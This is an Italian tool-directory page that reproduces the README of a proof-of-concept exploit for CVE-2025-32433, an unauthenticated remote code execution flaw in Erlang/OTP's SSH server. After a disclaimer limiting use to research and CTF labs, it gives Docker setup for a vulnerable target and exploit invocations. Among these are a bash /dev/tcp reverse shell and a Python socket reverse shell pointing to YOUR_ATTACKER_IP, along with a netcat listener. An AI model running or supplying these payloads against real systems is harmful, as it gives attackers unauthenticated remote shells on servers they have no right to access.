Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-32433-PoC — Proof-of-concept exploit per CVE-2025-32433, che consente l'esecuzione remota di codice non autenticata in Erlang/OTP SSH. Include configurazione Docker e payload di reverse shell per la ricerca sulla sicurezza e le sfide CTF. | Kitploit
Strumenti/GitHubGitHub/niteeshpujari/cve-2025-32433-poc
Analisi delle VulnerabilitàExploitCTFPenetration TestingApprendimento e FormazioneStrumento di Accesso Remoto
GitHubniteeshpujari/cve-2025-32433-poc

CVE-2025-32433-PoC

Proof-of-concept exploit per CVE-2025-32433, che consente l'esecuzione remota di codice non autenticata in Erlang/OTP SSH. Include configurazione Docker e payload di reverse shell per la ricerca sulla sicurezza e le sfide CTF.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
711 anno faNon ancora revisionato

CVE-2025-32433: PoC di RCE non autenticata su Erlang/OTP SSH

CVE-2025-32433

Questo repository contiene una Proof-of-Concept (PoC) per la CVE-2025-32433, una vulnerabilità critica di Remote Code Execution (RCE) non autenticata che interessa l'implementazione del server SSH in Erlang/Open Telecom Platform (OTP). Questa PoC è progettata per scopi educativi, ricerca sulla sicurezza e sfide Capture The Flag (CTF).

⚠️ Disclaimer - Solo per uso educativo ed etico ⚠️

Questa PoC è fornita esclusivamente per scopi educativi e di hacking etico. È destinata all'uso in ambienti controllati, come macchine virtuali isolate o piattaforme CTF, dove si dispone dell'autorizzazione esplicita a effettuare test di sicurezza.

NON utilizzare questa PoC contro qualsiasi sistema di cui non si è proprietari o per il quale non si ha un'autorizzazione esplicita e scritta a testare. L'accesso non autorizzato o lo sfruttamento di sistemi informatici è illegale e non etico. L'autore e i manutentori di questo repository non sono responsabili di qualsiasi uso improprio o danno causato da questo codice.


📊 Panoramica della vulnerabilità

AttributoDettagli
ID CVECVE-2025-32433
Tipo di vulnerabilitàRemote Code Execution (RCE) non autenticata
Punteggio CVSS v3.110.0 (Critico)
Software interessatoServer SSH Erlang/OTP (ssh)
Versioni interessateOTP-27.3.2 e precedenti
OTP-26.2.5.10 e precedenti
OTP-25.3.2.19 e precedenti
Versioni dalla OTP 17.0 e precedenti
Versioni corretteOTP-27.3.3, OTP-26.2.5.11, OTP-25.3.2.20

Dettagli tecnici

La vulnerabilità risiede nel modo in cui il server SSH Erlang/OTP elabora i messaggi del protocollo SSH durante la fase di pre-autenticazione. In particolare, il server non applica correttamente la sequenza del protocollo SSH, consentendo a un attaccante remoto non autenticato di inviare messaggi SSH_MSG_CHANNEL_OPEN e SSH_MSG_CHANNEL_REQUEST appositamente predisposti. Ciò consente all'attaccante di aprire un canale di sessione ed eseguire comandi Erlang arbitrari (che a loro volta possono eseguire comandi di sistema) senza fornire credenziali valide. Se il demone SSH viene eseguito con privilegi elevati (ad esempio come root), uno sfruttamento riuscito può portare al pieno compromesso del sistema.


🛠️ Configurazione: creare l'ambiente vulnerabile (Docker)

Il modo più semplice per configurare un server SSH Erlang/OTP vulnerabile è utilizzare il Dockerfile fornito.

  1. Clona questo repository:

    root@kitploit:~
    git clone https://github.com/NiteeshPujari/CVE-2025-32433-PoC.git
    cd CVE-2025-32433-PoC
    
  2. Crea l'immagine Docker: Questo comando compila una versione vulnerabile di Erlang/OTP (OTP-26.2.5.10) e configura il server SSH.

    root@kitploit:~
    docker build -t erlang-ssh-vulnerable .
    
  3. Esegui il container del server vulnerabile: Questo avvia il server SSH Erlang/OTP in background, in ascolto sulla porta 2222.

    root@kitploit:~
    docker run -d --name erlang-ssh-target -p 2222:2222 erlang-ssh-vulnerable
    
    • -d: Esegue il container in modalità distaccata.
    • --name erlang-ssh-target: Assegna un nome al container per una gestione semplice.
    • -p 2222:2222: Mappa la porta host 2222 alla porta container 2222.

🚀 Utilizzo: eseguire lo script PoC

Lo script cve_2025_32433_exploit.py può essere eseguito in modalità interattiva o con argomenti da riga di comando.

Modalità interattiva

Se esegui lo script senza argomenti, ti verranno richieste le informazioni necessarie.

  1. Assicurati che il container Docker vulnerabile sia in esecuzione.
  2. Esegui lo script PoC Python:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py
    
  3. Segui le richieste interattive: Lo script chiederà:
    • Indirizzo IP del target: (ad es. 127.0.0.1 se si punta a Docker sullo stesso host).
    • Porta del target: (ad es. 2222).
    • Comando da eseguire: (lasciare vuoto per il comando di test predefinito).

Esempio 1: Testare la RCE creando un file

Questo è il comportamento predefinito se si lascia vuoto il prompt del comando in modalità interattiva. Crea un file /tmp/note.txt sul target.

  1. Esegui l'exploit:
    root@kitploit:~
    python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'file:write_file("/tmp/note.txt", "Exploit Ran!").'
    
  2. Verifica che il file sia stato creato sul target:
    root@kitploit:~
    docker exec -it erlang-ssh-target cat /tmp/note.txt
    
    Dovresti vedere l'output: Exploit Ran!

Esempio 2: Ottenere una reverse shell

Per ottenere una reverse shell, devi fornire un payload che si colleghi di nuovo a un listener sulla tua macchina.

  1. Avvia un listener Netcat sulla tua macchina attaccante (ad es. Kali Linux) sulla porta scelta.

    root@kitploit:~
    nc -lvnp 4444
    

    Importante: Assicurati che il firewall (ad es. ufw) sulla tua macchina attaccante consenta le connessioni in ingresso su questa porta. sudo ufw allow 4444/tcp

  2. Esegui lo script PoC con il payload della reverse shell. Sostituisci YOUR_ATTACKER_IP con l'indirizzo IP della tua macchina.

    • Reverse shell Bash:

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("bash -i >& /dev/tcp/YOUR_ATTACKER_IP/4444 0>&1").'
      
    • Reverse shell Python (spesso più affidabile):

      root@kitploit:~
      python3 cve_2025_32433_exploit.py --target-ip 127.0.0.1 --target-port 2222 --command 'os:cmd("python3 -c ''import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR_ATTACKER_IP\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);''").'
      
  3. Controlla il tuo listener Netcat. Dovresti ricevere una connessione e avere una shell sul container target.


🧹 Pulizia

Per fermare e rimuovere il container e l'immagine Docker:

root@kitploit:~
# Stop and remove the container
docker stop erlang-ssh-target
docker rm erlang-ssh-target

# Optional: remove the image as well
docker rmi erlang-ssh-vulnerable
Scarica lo strumento
  • Verifica che il container sia in esecuzione:

    root@kitploit:~
    docker ps